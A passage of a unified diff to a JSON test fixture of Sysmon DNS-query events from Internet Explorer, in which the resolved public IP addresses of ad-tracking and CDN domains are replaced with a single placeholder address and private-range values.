Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053883400Z'/\u003e\u003cEventRecordID\u003e186\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.050\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003et.a3cloud.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 d386jaag4hn9zl.cloudfront.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6714,7 +6714,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053900700Z'/\u003e\u003cEventRecordID\u003e187\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps618.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "level": "information", @@ -6727,7 +6727,7 @@ "ProcessId": "2736", "QueryName": "tps618.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 nycp-hlb.doubleverify.com;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -6762,7 +6762,7 @@ "ProcessId": "2736", "QueryName": "dpm.demdex.net", "QueryStatus": "0", - "QueryResults": "type: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;", + "QueryResults": "type: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.090" }, @@ -6780,7 +6780,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:54.157.69.185;::ffff:18.209.139.81;::ffff:18.233.36.36;::ffff:52.54.198.81;::ffff:52.55.201.28;::ffff:18.210.34.44;::ffff:52.72.163.149;::ffff:18.232.198.130;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053914100Z'/\u003e\u003cEventRecordID\u003e188\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.090\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edpm.demdex.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 gslb-2.demdex.net;type: 5 edge-va6.demdex.net;type: 5 dcs-edge-va6-802167536.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6792,7 +6792,7 @@ { "@timestamp": "2021-05-05T15:30:51.710Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6821,7 +6821,7 @@ "ProcessId": "2736", "QueryName": "secure.adnxs.com", "QueryStatus": "0", - "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;" + "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;" }, "event_id": "22", "provider_name": "Microsoft-Windows-Sysmon", @@ -6838,7 +6838,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6864,7 +6864,7 @@ "event_data": { "QueryName": "tps.doubleverify.com", "QueryStatus": "0", - "QueryResults": "type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.478", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6880,7 +6880,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6890,7 +6890,7 @@ "event_data": { "QueryName": "i.liadm.com", "QueryStatus": "0", - "QueryResults": "type: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.536", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -6923,7 +6923,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -6940,7 +6940,7 @@ "time_created": "2019-07-18T03:34:09.067Z", "level": "information", "event_data": { - "QueryResults": "::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": 